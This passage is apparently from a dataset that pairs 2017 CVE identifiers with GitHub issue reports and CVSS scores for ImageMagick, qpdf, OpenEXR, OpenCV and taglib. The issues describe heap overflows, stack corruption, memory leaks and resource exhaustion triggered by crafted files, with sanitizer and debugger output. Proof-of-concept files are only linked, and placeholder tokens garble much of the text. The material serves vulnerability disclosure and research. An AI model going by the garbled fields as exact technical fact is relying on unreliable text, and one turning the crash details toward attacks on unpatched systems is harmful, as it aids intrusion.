  7584. "Issue_Url_new": "https://github.com/imagemagick/imagemagick/issues/535",
  7585. "Repo_new": "imagemagick/imagemagick",
  7586. "Issue_Created_At": "2017-07-04T13:45:58Z",
  7587. "description": "CPU exhaustion in APITAG Version: APITAG NUMBERTAG Q NUMBERTAG magick identify $FILE Here is the critical code CODETAG magick[...] is from APITAG ERRORTAG magick[x] can be large as NUMBERTAG ff: ERRORTAG So 'filesize' can be large as NUMBERTAG UL NUMBERTAG w, the loop in the above will be large. On the other handle, APITAG in the loop has no success_status checking, so a crafted file will cause a larget of failed I/O in the loop. testcase: URLTAG Credit: APITAG of Venustech",
  7588. "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H",
  7589. "severity": "HIGH",
  7590. "baseScore": 8.8,
  7591. "impactScore": 5.9,
  7592. "exploitabilityScore": 2.8
  7593. },
  7594. {
  7595. "CVE_ID": "CVE-2017-12595",
  7596. "Issue_Url_old": "https://github.com/qpdf/qpdf/issues/146",
  7597. "Issue_Url_new": "https://github.com/qpdf/qpdf/issues/146",
  7598. "Repo_new": "qpdf/qpdf",
  7599. "Issue_Created_At": "2017-08-22T11:31:11Z",
  7600. "description": "QPDF NUMBERTAG Stack Corruption. APITAG debugging using libthread_db enabled] Using host libthread_db library PATHTAG WARNING: APITAG file is damaged WARNING: APITAG can't find startxref WARNING: APITAG Attempting to reconstruct cross reference table Program received signal SIGSEGV, Segmentation fault NUMBERTAG ffff7b NUMBERTAG in APITAG APITAG std::char_traits APITAG , std::allocator APITAG > const&, APITAG bool&, APITAG , QPDF , bool, bool, bool) () from PATHTAG (gdb) exploitable Description: Possible stack corruption Short description: APITAG NUMBERTAG Hash: APITAG Exploitability Classification: EXPLOITABLE Explanation: GDB generated an error while unwinding the stack and/or the stack contained return addresses that were not mapped in the inferior's process address space and/or the stack pointer is pointing to a location outside the default stack region. These conditions likely indicate stack corruption, which is generally considered exploitable. Other tags: APITAG NUMBERTAG APITAG NUMBERTAG",
  7601. "vectorString": "CVSS:3.0/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H",
  7602. "severity": "HIGH",
  7603. "baseScore": 7.8,
  7604. "impactScore": 5.9,
  7605. "exploitabilityScore": 1.8
  7606. },
  7607. {
  7608. "CVE_ID": "CVE-2017-12596",
  7609. "Issue_Url_old": "https://github.com/openexr/openexr/issues/238",
  7610. "Issue_Url_new": "https://github.com/academysoftwarefoundation/openexr/issues/238",
  7611. "Repo_new": "academysoftwarefoundation/openexr",
  7612. "Issue_Created_At": "2017-07-29T06:35:23Z",
  7613. "description": "heap based buffer overflow in exrmaketiled . A heap based buffer overflow occurs when we test exrmaketiled with the latest code of this repo. The details of the bug as follows: $ ./exrmaketiled PATHTAG /tmp/out APITAG NUMBERTAG ERROR: APITAG heap buffer overflow on address NUMBERTAG c7fe at pc NUMBERTAG fc NUMBERTAG e NUMBERTAG a5ab bp NUMBERTAG ffe NUMBERTAG e7e0 sp NUMBERTAG ffe NUMBERTAG e7d8 READ of size NUMBERTAG at NUMBERTAG c7fe thread T NUMBERTAG fc NUMBERTAG e NUMBERTAG a5aa in APITAG PATHTAG NUMBERTAG fc NUMBERTAG e NUMBERTAG a5aa in APITAG const , int, unsigned short , int) PATHTAG NUMBERTAG fc NUMBERTAG e NUMBERTAG ca7 in APITAG const , int, APITAG >, char const &) PATHTAG NUMBERTAG fc NUMBERTAG e NUMBERTAG in APITAG const , int, int, char const &) PATHTAG NUMBERTAG fc NUMBERTAG ea NUMBERTAG bb7 in execute PATHTAG NUMBERTAG fc NUMBERTAG d NUMBERTAG ea in APITAG ) PATHTAG NUMBERTAG fc NUMBERTAG ea7c NUMBERTAG in APITAG int) PATHTAG NUMBERTAG fc NUMBERTAG e NUMBERTAG c7c in APITAG int) PATHTAG NUMBERTAG ed in APITAG const , char const , int, APITAG APITAG APITAG int, int, std::set<std::string, std::less APITAG , std::allocator APITAG > const&, Extrapolation, Extrapolation, bool) PATHTAG NUMBERTAG in main PATHTAG NUMBERTAG fc NUMBERTAG dd NUMBERTAG f NUMBERTAG in __libc_start_main ( PATHTAG NUMBERTAG c ( PATHTAG NUMBERTAG c7fe is located NUMBERTAG bytes to the left of NUMBERTAG byte region APITAG allocated by thread T0 here NUMBERTAG fc NUMBERTAG f NUMBERTAG a NUMBERTAG f in operator APITAG long) ( PATHTAG NUMBERTAG fc NUMBERTAG e NUMBERTAG adf0 in APITAG const&, unsigned long, unsigned long) PATHTAG SUMMARY: APITAG heap buffer overflow PATHTAG APITAG Shadow bytes around the buggy address NUMBERTAG c NUMBERTAG ffff8a0: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa NUMBERTAG c NUMBERTAG ffff8b0: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa NUMBERTAG c NUMBERTAG ffff8c0: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa NUMBERTAG c 
NUMBERTAG ffff8d0: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa NUMBERTAG c NUMBERTAG ffff8e0: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa NUMBERTAG c NUMBERTAG ffff8f0: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa[fa NUMBERTAG c NUMBERTAG ffff NUMBERTAG c NUMBERTAG ffff NUMBERTAG c NUMBERTAG ffff NUMBERTAG c NUMBERTAG ffff NUMBERTAG c NUMBERTAG ffff NUMBERTAG Shadow byte legend (one shadow byte represents NUMBERTAG application bytes): Addressable NUMBERTAG Partially addressable NUMBERTAG Heap left redzone: fa Heap right redzone: fb Freed heap region: fd Stack left redzone: f1 Stack mid redzone: f2 Stack right redzone: f3 Stack partial redzone: f4 Stack after return: f5 Stack use after scope: f8 Global redzone: f9 Global init order: f6 Poisoned by user: f7 Contiguous container OOB:fc APITAG internal: fe NUMBERTAG ABORTING And you could get the testcase and more details: URLTAG FILETAG",
  7614. "vectorString": "CVSS:3.0/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H",
  7615. "severity": "HIGH",
  7616. "baseScore": 7.8,
  7617. "impactScore": 5.9,
  7618. "exploitabilityScore": 1.8
  7619. },
  7620. {
  7621. "CVE_ID": "CVE-2017-12597",
  7622. "Issue_Url_old": "https://github.com/opencv/opencv/issues/9309",
  7623. "Issue_Url_new": "https://github.com/opencv/opencv/issues/9309",
  7624. "Repo_new": "opencv/opencv",
  7625. "Issue_Created_At": "2017-08-04T09:29:14Z",
  7626. "description": "Some bugs result to crashes when in imread of opencv (include heap overflow and out of bound write). APITAG Some crashes are found in opencv when a malformed image file read by calling \"cv::imread\" function. Openc NUMBERTAG and the latest commit are tested, but it seems that the bugs also impacts Openc NUMBERTAG The bugs which result to \"segment fault\" are including heap overflow and out of bound write, which may be potential security threat. System information (version) APITAG NUMBERTAG Operating System / Platform => Windows NUMBERTAG Bit Compiler => Visual Studio NUMBERTAG APITAG NUMBERTAG Operating System / Platform => Linux Compiler => gcc Detailed description Some details are as follows: APITAG details and testcases refer to : FILETAG ================== An out of bound write error occurs when reads it by using cv::imread. ERRORTAG NUMBERTAG A heap based buf overflow results to invalid write ERRORTAG Steps to reproduce just call the cv::imread to read the specified testcase. Please refer to the following url for the testcases: testcases URLTAG URLTAG",
  7627. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H",
  7628. "severity": "HIGH",
  7629. "baseScore": 8.8,
  7630. "impactScore": 5.9,
  7631. "exploitabilityScore": 2.8
  7632. },
  7633. {
  7634. "CVE_ID": "CVE-2017-12600",
  7635. "Issue_Url_old": "https://github.com/opencv/opencv/issues/9311",
  7636. "Issue_Url_new": "https://github.com/opencv/opencv/issues/9311",
  7637. "Repo_new": "opencv/opencv",
  7638. "Issue_Created_At": "2017-08-04T10:12:30Z",
  7639. "description": "Two DOS bugs of opencv. APITAG Two DOS bugs are reported, one exhausts cpu for a long time and the other exhausts memory at mean while. System information (version) APITAG NUMBERTAG Operating System / Platform => Linu NUMBERTAG Bit Compiler => Gcc > APITAG NUMBERTAG Operating System / Platform => Linux Compiler => Gcc Detailed description Please see the bug NUMBERTAG and bug NUMBERTAG for the details in the following url: FILETAG and testcases in testcases URLTAG URLTAG",
  7640. "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H",
  7641. "severity": "HIGH",
  7642. "baseScore": 7.5,
  7643. "impactScore": 3.6,
  7644. "exploitabilityScore": 3.9
  7645. },
  7646. {
  7647. "CVE_ID": "CVE-2017-12640",
  7648. "Issue_Url_old": "https://github.com/ImageMagick/ImageMagick/issues/542",
  7649. "Issue_Url_new": "https://github.com/imagemagick/imagemagick/issues/542",
  7650. "Repo_new": "imagemagick/imagemagick",
  7651. "Issue_Created_At": "2017-07-05T02:32:19Z",
  7652. "description": "heap buffer overflow in APITAG Version: APITAG NUMBERTAG Q NUMBERTAG magick identify $FILE Here is the critical code ERRORTAG So a crafted file will cause x_off[i] out of bound operation vulnerability. testcase: URLTAG Credit: APITAG of Venustech",
  7653. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H",
  7654. "severity": "HIGH",
  7655. "baseScore": 8.8,
  7656. "impactScore": 5.9,
  7657. "exploitabilityScore": 2.8
  7658. },
  7659. {
  7660. "CVE_ID": "CVE-2017-12641",
  7661. "Issue_Url_old": "https://github.com/ImageMagick/ImageMagick/issues/550",
  7662. "Issue_Url_new": "https://github.com/imagemagick/imagemagick/issues/550",
  7663. "Repo_new": "imagemagick/imagemagick",
  7664. "Issue_Created_At": "2017-07-08T13:35:29Z",
  7665. "description": "memory leak in APITAG Version: APITAG NUMBERTAG Q NUMBERTAG ERRORTAG testcase: URLTAG Credit : APITAG of Venustech",
  7666. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H",
  7667. "severity": "HIGH",
  7668. "baseScore": 8.8,
  7669. "impactScore": 5.9,
  7670. "exploitabilityScore": 2.8
  7671. },
  7672. {
  7673. "CVE_ID": "CVE-2017-12642",
  7674. "Issue_Url_old": "https://github.com/ImageMagick/ImageMagick/issues/552",
  7675. "Issue_Url_new": "https://github.com/imagemagick/imagemagick/issues/552",
  7676. "Repo_new": "imagemagick/imagemagick",
  7677. "Issue_Created_At": "2017-07-09T01:39:20Z",
  7678. "description": "memory leak in APITAG . Version: APITAG NUMBERTAG Q NUMBERTAG ERRORTAG testcase: URLTAG Credit : APITAG of Venustech",
  7679. "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H",
  7680. "severity": "HIGH",
  7681. "baseScore": 8.8,
  7682. "impactScore": 5.9,
  7683. "exploitabilityScore": 2.8
  7684. },
  7685. {
  7686. "CVE_ID": "CVE-2017-12643",
  7687. "Issue_Url_old": "https://github.com/ImageMagick/ImageMagick/issues/549",
  7688. "Issue_Url_new": "https://github.com/imagemagick/imagemagick/issues/549",
  7689. "Repo_new": "imagemagick/imagemagick",
  7690. "Issue_Created_At": "2017-07-08T09:08:24Z",
  7691. "description": "memory exhaustion in APITAG in png.c. Version: APITAG NUMBERTAG Q NUMBERTAG APITAG When identify JNG file that contains chunk data, imagemagick will allocate memory to store the chunk data in function APITAG Here is the critical code: ERRORTAG length can be controlled as follow: ERRORTAG So the only limitation is it must smaller than PNG_UINT NUMBERTAG MAX, it is still very large. Also when chunk type is JDAT, it will write chunk data to file as follow: ERRORTAG So a crafted jng file can cause memory exhausted and large I/O. testcase: URLTAG Credit: APITAG of Venustech",
  7692. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H",
  7693. "severity": "MEDIUM",
  7694. "baseScore": 6.5,
  7695. "impactScore": 3.6,
  7696. "exploitabilityScore": 2.8
  7697. },
  7698. {
  7699. "CVE_ID": "CVE-2017-12644",
  7700. "Issue_Url_old": "https://github.com/ImageMagick/ImageMagick/issues/551",
  7701. "Issue_Url_new": "https://github.com/imagemagick/imagemagick/issues/551",
  7702. "Repo_new": "imagemagick/imagemagick",
  7703. "Issue_Created_At": "2017-07-09T01:35:51Z",
  7704. "description": "memory leak in APITAG Version: APITAG NUMBERTAG Q NUMBERTAG ERRORTAG testcase: URLTAG Credit : APITAG of Venustech",
  7705. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H",
  7706. "severity": "HIGH",
  7707. "baseScore": 8.8,
  7708. "impactScore": 5.9,
  7709. "exploitabilityScore": 2.8
  7710. },
  7711. {
  7712. "CVE_ID": "CVE-2017-12654",
  7713. "Issue_Url_old": "https://github.com/ImageMagick/ImageMagick/issues/620",
  7714. "Issue_Url_new": "https://github.com/imagemagick/imagemagick/issues/620",
  7715. "Repo_new": "imagemagick/imagemagick",
  7716. "Issue_Created_At": "2017-07-25T11:13:37Z",
  7717. "description": "memory leak in APITAG Version: APITAG NUMBERTAG Q NUMBERTAG A memory leak vulnerability was found in function APITAG, which allows attackers to cause a denial of service (memory leak) via a crafted file. ERRORTAG testcase: FILETAG APITAG of Venustech",
  7718. "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H",
  7719. "severity": "MEDIUM",
  7720. "baseScore": 6.5,
  7721. "impactScore": 3.6,
  7722. "exploitabilityScore": 2.8
  7723. },
  7724. {
  7725. "CVE_ID": "CVE-2017-12662",
  7726. "Issue_Url_old": "https://github.com/ImageMagick/ImageMagick/issues/576",
  7727. "Issue_Url_new": "https://github.com/imagemagick/imagemagick/issues/576",
  7728. "Repo_new": "imagemagick/imagemagick",
  7729. "Issue_Created_At": "2017-07-17T01:34:17Z",
  7730. "description": "memory leak in APITAG Version: APITAG NUMBERTAG Q NUMBERTAG ERRORTAG POC: URLTAG Credit : APITAG of Venustech",
  7731. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H",
  7732. "severity": "HIGH",
  7733. "baseScore": 8.8,
  7734. "impactScore": 5.9,
  7735. "exploitabilityScore": 2.8
  7736. },
  7737. {
  7738. "CVE_ID": "CVE-2017-12663",
  7739. "Issue_Url_old": "https://github.com/ImageMagick/ImageMagick/issues/573",
  7740. "Issue_Url_new": "https://github.com/imagemagick/imagemagick/issues/573",
  7741. "Repo_new": "imagemagick/imagemagick",
  7742. "Issue_Created_At": "2017-07-17T01:21:03Z",
  7743. "description": "memory leak in APITAG Version: APITAG NUMBERTAG Q NUMBERTAG ERRORTAG POC: URLTAG Credit : APITAG of Venustech",
  7744. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H",
  7745. "severity": "HIGH",
  7746. "baseScore": 8.8,
  7747. "impactScore": 5.9,
  7748. "exploitabilityScore": 2.8
  7749. },
  7750. {
  7751. "CVE_ID": "CVE-2017-12664",
  7752. "Issue_Url_old": "https://github.com/ImageMagick/ImageMagick/issues/574",
  7753. "Issue_Url_new": "https://github.com/imagemagick/imagemagick/issues/574",
  7754. "Repo_new": "imagemagick/imagemagick",
  7755. "Issue_Created_At": "2017-07-17T01:25:28Z",
  7756. "description": "memory leak in APITAG Version: APITAG NUMBERTAG Q NUMBERTAG ERRORTAG POC: URLTAG Credit : APITAG of Venustech",
  7757. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H",
  7758. "severity": "HIGH",
  7759. "baseScore": 8.8,
  7760. "impactScore": 5.9,
  7761. "exploitabilityScore": 2.8
  7762. },
  7763. {
  7764. "CVE_ID": "CVE-2017-12665",
  7765. "Issue_Url_old": "https://github.com/ImageMagick/ImageMagick/issues/577",
  7766. "Issue_Url_new": "https://github.com/imagemagick/imagemagick/issues/577",
  7767. "Repo_new": "imagemagick/imagemagick",
  7768. "Issue_Created_At": "2017-07-17T01:38:06Z",
  7769. "description": "memory leak in APITAG Version: APITAG NUMBERTAG Q NUMBERTAG ERRORTAG POC: URLTAG Credit : APITAG of Venustech",
  7770. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H",
  7771. "severity": "HIGH",
  7772. "baseScore": 8.8,
  7773. "impactScore": 5.9,
  7774. "exploitabilityScore": 2.8
  7775. },
  7776. {
  7777. "CVE_ID": "CVE-2017-12666",
  7778. "Issue_Url_old": "https://github.com/ImageMagick/ImageMagick/issues/572",
  7779. "Issue_Url_new": "https://github.com/imagemagick/imagemagick/issues/572",
  7780. "Repo_new": "imagemagick/imagemagick",
  7781. "Issue_Created_At": "2017-07-17T00:39:44Z",
  7782. "description": "memory leak in APITAG Version: APITAG NUMBERTAG Q NUMBERTAG ERRORTAG POC: URLTAG Credit : APITAG of Venustech",
  7783. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H",
  7784. "severity": "HIGH",
  7785. "baseScore": 8.8,
  7786. "impactScore": 5.9,
  7787. "exploitabilityScore": 2.8
  7788. },
  7789. {
  7790. "CVE_ID": "CVE-2017-12667",
  7791. "Issue_Url_old": "https://github.com/ImageMagick/ImageMagick/issues/553",
  7792. "Issue_Url_new": "https://github.com/imagemagick/imagemagick/issues/553",
  7793. "Repo_new": "imagemagick/imagemagick",
  7794. "Issue_Created_At": "2017-07-09T01:50:39Z",
  7795. "description": "memory leak in APITAG Version: APITAG NUMBERTAG Q NUMBERTAG ERRORTAG testcase: URLTAG Credit : APITAG of Venustech",
  7796. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H",
  7797. "severity": "HIGH",
  7798. "baseScore": 8.8,
  7799. "impactScore": 5.9,
  7800. "exploitabilityScore": 2.8
  7801. },
  7802. {
  7803. "CVE_ID": "CVE-2017-12668",
  7804. "Issue_Url_old": "https://github.com/ImageMagick/ImageMagick/issues/575",
  7805. "Issue_Url_new": "https://github.com/imagemagick/imagemagick/issues/575",
  7806. "Repo_new": "imagemagick/imagemagick",
  7807. "Issue_Created_At": "2017-07-17T01:29:33Z",
  7808. "description": "memory leak in APITAG . Version: APITAG NUMBERTAG Q NUMBERTAG ERRORTAG POC: URLTAG Credit : APITAG of Venustech",
  7809. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H",
  7810. "severity": "HIGH",
  7811. "baseScore": 8.8,
  7812. "impactScore": 5.9,
  7813. "exploitabilityScore": 2.8
  7814. },
  7815. {
  7816. "CVE_ID": "CVE-2017-12669",
  7817. "Issue_Url_old": "https://github.com/ImageMagick/ImageMagick/issues/571",
  7818. "Issue_Url_new": "https://github.com/imagemagick/imagemagick/issues/571",
  7819. "Repo_new": "imagemagick/imagemagick",
  7820. "Issue_Created_At": "2017-07-17T00:25:46Z",
  7821. "description": "memory leak in APITAG Version: APITAG NUMBERTAG Q NUMBERTAG ERRORTAG POC: URLTAG Credit : APITAG of Venustech",
  7822. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H",
  7823. "severity": "HIGH",
  7824. "baseScore": 8.8,
  7825. "impactScore": 5.9,
  7826. "exploitabilityScore": 2.8
  7827. },
  7828. {
  7829. "CVE_ID": "CVE-2017-12670",
  7830. "Issue_Url_old": "https://github.com/ImageMagick/ImageMagick/issues/610",
  7831. "Issue_Url_new": "https://github.com/imagemagick/imagemagick/issues/610",
  7832. "Repo_new": "imagemagick/imagemagick",
  7833. "Issue_Created_At": "2017-07-24T12:28:48Z",
  7834. "description": "assertion failed in APITAG Version: APITAG NUMBERTAG Q NUMBERTAG A crafted file revealed an assertion failure in image.c. APITAG testcase: URLTAG Credit: APITAG of Venustech",
  7835. "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H",
  7836. "severity": "MEDIUM",
  7837. "baseScore": 6.5,
  7838. "impactScore": 3.6,
  7839. "exploitabilityScore": 2.8
  7840. },
  7841. {
  7842. "CVE_ID": "CVE-2017-12671",
  7843. "Issue_Url_old": "https://github.com/ImageMagick/ImageMagick/issues/621",
  7844. "Issue_Url_new": "https://github.com/imagemagick/imagemagick/issues/621",
  7845. "Repo_new": "imagemagick/imagemagick",
  7846. "Issue_Created_At": "2017-07-25T11:36:32Z",
  7847. "description": "bad free in APITAG Version: APITAG NUMBERTAG Q NUMBERTAG A bad free vulnerability was found in function APITAG, which allows attackers to cause a denial of service (bad free) via a crafted file. ERRORTAG testcase: URLTAG APITAG of Venustech",
  7848. "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H",
  7849. "severity": "MEDIUM",
  7850. "baseScore": 6.5,
  7851. "impactScore": 3.6,
  7852. "exploitabilityScore": 2.8
  7853. },
  7854. {
  7855. "CVE_ID": "CVE-2017-12672",
  7856. "Issue_Url_old": "https://github.com/ImageMagick/ImageMagick/issues/617",
  7857. "Issue_Url_new": "https://github.com/imagemagick/imagemagick/issues/617",
  7858. "Repo_new": "imagemagick/imagemagick",
  7859. "Issue_Created_At": "2017-07-25T11:05:14Z",
  7860. "description": "memory leak in APITAG Version: APITAG NUMBERTAG Q NUMBERTAG A memory leak vulnerability was found in function APITAG, which allows attackers to cause a denial of service (memory leak) via a crafted file. ERRORTAG testcase: FILETAG APITAG of Venustech",
  7861. "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H",
  7862. "severity": "MEDIUM",
  7863. "baseScore": 6.5,
  7864. "impactScore": 3.6,
  7865. "exploitabilityScore": 2.8
  7866. },
  7867. {
  7868. "CVE_ID": "CVE-2017-12673",
  7869. "Issue_Url_old": "https://github.com/ImageMagick/ImageMagick/issues/619",
  7870. "Issue_Url_new": "https://github.com/imagemagick/imagemagick/issues/619",
  7871. "Repo_new": "imagemagick/imagemagick",
  7872. "Issue_Created_At": "2017-07-25T11:12:37Z",
  7873. "description": "memory leak in APITAG Version: APITAG NUMBERTAG Q NUMBERTAG A memory leak vulnerability was found in function APITAG, which allows attackers to cause a denial of service (memory leak) via a crafted file. ERRORTAG testcase: FILETAG APITAG of Venustech",
  7874. "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H",
  7875. "severity": "MEDIUM",
  7876. "baseScore": 6.5,
  7877. "impactScore": 3.6,
  7878. "exploitabilityScore": 2.8
  7879. },
  7880. {
  7881. "CVE_ID": "CVE-2017-12674",
  7882. "Issue_Url_old": "https://github.com/ImageMagick/ImageMagick/issues/604",
  7883. "Issue_Url_new": "https://github.com/imagemagick/imagemagick/issues/604",
  7884. "Repo_new": "imagemagick/imagemagick",
  7885. "Issue_Created_At": "2017-07-23T15:22:16Z",
  7886. "description": "CPU exhaustion in APITAG Version: APITAG NUMBERTAG Q NUMBERTAG APITAG When converting a PDB file, imagemagick reads data from the input file and processes it; here is the critical code: pdb.c, in function APITAG CODETAG A crafted file can make this while loop run endlessly. testcase: FILETAG Credit: APITAG of Venustech",
  7887. "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H",
  7888. "severity": "MEDIUM",
  7889. "baseScore": 6.5,
  7890. "impactScore": 3.6,
  7891. "exploitabilityScore": 2.8
  7892. },
  7893. {
  7894. "CVE_ID": "CVE-2017-12675",
  7895. "Issue_Url_old": "https://github.com/ImageMagick/ImageMagick/issues/616",
  7896. "Issue_Url_new": "https://github.com/imagemagick/imagemagick/issues/616",
  7897. "Repo_new": "imagemagick/imagemagick",
  7898. "Issue_Created_At": "2017-07-25T11:03:39Z",
  7899. "description": "memory leak in APITAG Version: APITAG NUMBERTAG Q NUMBERTAG A memory leak vulnerability was found in function APITAG, which allows attackers to cause a denial of service (memory leak) via a crafted file. ERRORTAG testcase: FILETAG APITAG of Venustech",
  7900. "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H",
  7901. "severity": "MEDIUM",
  7902. "baseScore": 6.5,
  7903. "impactScore": 3.6,
  7904. "exploitabilityScore": 2.8
  7905. },
  7906. {
  7907. "CVE_ID": "CVE-2017-12676",
  7908. "Issue_Url_old": "https://github.com/ImageMagick/ImageMagick/issues/618",
  7909. "Issue_Url_new": "https://github.com/imagemagick/imagemagick/issues/618",
  7910. "Repo_new": "imagemagick/imagemagick",
  7911. "Issue_Created_At": "2017-07-25T11:06:12Z",
  7912. "description": "memory leak in APITAG Version: APITAG NUMBERTAG Q NUMBERTAG A memory leak vulnerability was found in function APITAG, which allows attackers to cause a denial of service (memory leak) via a crafted file. ERRORTAG testcase: FILETAG APITAG of Venustech",
  7913. "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H",
  7914. "severity": "MEDIUM",
  7915. "baseScore": 6.5,
  7916. "impactScore": 3.6,
  7917. "exploitabilityScore": 2.8
  7918. },
  7919. {
  7920. "CVE_ID": "CVE-2017-12678",
  7921. "Issue_Url_old": "https://github.com/taglib/taglib/issues/829",
  7922. "Issue_Url_new": "https://github.com/taglib/taglib/issues/829",
  7923. "Repo_new": "taglib/taglib",
  7924. "Issue_Created_At": "2017-07-18T02:28:33Z",
  7925. "description": "A pointer cast vulnerability was discovered in the project. Overview: I discovered a pointer cast vulnerability in APITAG The vulnerability exists in the code that reads the ID NUMBERTAG tag of an mp3 file. APITAG When casting a pointer of a List in a tag to APITAG, the address of the APITAG in the tag becomes an invalid value. Report and POC: The detailed analysis report and APITAG files can be found in the attachment. In order to avoid disclosing it before the release of a patch, I have encrypted the zip file. Developers can communicate with me to get the password. FILETAG Author name: APITAG @ VARAS of IIE APITAG Liu @ VARAS of IIE email: EMAILTAG org: IIE ( FILETAG Note: I have also reported this to the APITAG Security Team.",
  7926. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H",
  7927. "severity": "HIGH",
  7928. "baseScore": 8.8,
  7929. "impactScore": 5.9,
  7930. "exploitabilityScore": 2.8
  7931. },
  7932. {
  7933. "CVE_ID": "CVE-2017-12691",
  7934. "Issue_Url_old": "https://github.com/ImageMagick/ImageMagick/issues/656",
  7935. "Issue_Url_new": "https://github.com/imagemagick/imagemagick/issues/656",
  7936. "Repo_new": "imagemagick/imagemagick",
  7937. "Issue_Created_At": "2017-08-07T01:40:35Z",
  7938. "description": "memory exhaustion in APITAG PATHTAG magick version Version: APITAG NUMBERTAG Q NUMBERTAG i NUMBERTAG FILETAG Copyright NUMBERTAG APITAG Studio LLC License: FILETAG Features: Cipher DPC HDRI APITAG Delegates (built in): jng jpeg png xml zlib PATHTAG magick convert oom APITAG /dev/null NUMBERTAG ERROR: APITAG failed to allocate NUMBERTAG c NUMBERTAG bytes of APITAG NUMBERTAG APITAG memory map follows NUMBERTAG d NUMBERTAG PATHTAG NUMBERTAG d NUMBERTAG d NUMBERTAG PATHTAG NUMBERTAG d NUMBERTAG PATHTAG NUMBERTAG a NUMBERTAG ffff NUMBERTAG heap NUMBERTAG ffff NUMBERTAG b1a NUMBERTAG b NUMBERTAG b NUMBERTAG f NUMBERTAG a0df NUMBERTAG a0df NUMBERTAG a0df NUMBERTAG a0df NUMBERTAG a NUMBERTAG f NUMBERTAG a NUMBERTAG c NUMBERTAG a NUMBERTAG d NUMBERTAG a NUMBERTAG d NUMBERTAG a1f7d NUMBERTAG a NUMBERTAG a NUMBERTAG a NUMBERTAG c NUMBERTAG a NUMBERTAG d NUMBERTAG a NUMBERTAG d NUMBERTAG a2d NUMBERTAG stack NUMBERTAG b2f NUMBERTAG b NUMBERTAG b NUMBERTAG b NUMBERTAG b NUMBERTAG b NUMBERTAG b NUMBERTAG b NUMBERTAG b NUMBERTAG b NUMBERTAG b NUMBERTAG b3a NUMBERTAG b3b NUMBERTAG b3c NUMBERTAG b3d NUMBERTAG b3e NUMBERTAG b3f NUMBERTAG b NUMBERTAG PATHTAG NUMBERTAG b NUMBERTAG b NUMBERTAG b NUMBERTAG b NUMBERTAG b NUMBERTAG b NUMBERTAG b NUMBERTAG b NUMBERTAG b NUMBERTAG b4a NUMBERTAG b4b NUMBERTAG b4c NUMBERTAG b4d NUMBERTAG b4e NUMBERTAG b4f NUMBERTAG b NUMBERTAG b NUMBERTAG b NUMBERTAG b NUMBERTAG b NUMBERTAG b NUMBERTAG b NUMBERTAG b NUMBERTAG b NUMBERTAG b NUMBERTAG b5a NUMBERTAG b5ad NUMBERTAG b5c NUMBERTAG b5c NUMBERTAG b5c6e NUMBERTAG b5c6e NUMBERTAG b5c6f NUMBERTAG PATHTAG NUMBERTAG b5c6f NUMBERTAG b6e NUMBERTAG b6e NUMBERTAG b6e NUMBERTAG PATHTAG NUMBERTAG b6e NUMBERTAG b6e NUMBERTAG PATHTAG NUMBERTAG b6e NUMBERTAG b6e NUMBERTAG PATHTAG NUMBERTAG b6e NUMBERTAG b6e4b NUMBERTAG PATHTAG NUMBERTAG b6e4b NUMBERTAG b6e4c NUMBERTAG PATHTAG NUMBERTAG b6e4c NUMBERTAG b6e4d NUMBERTAG PATHTAG NUMBERTAG b6e4d NUMBERTAG b6ff NUMBERTAG PATHTAG NUMBERTAG b6ff 
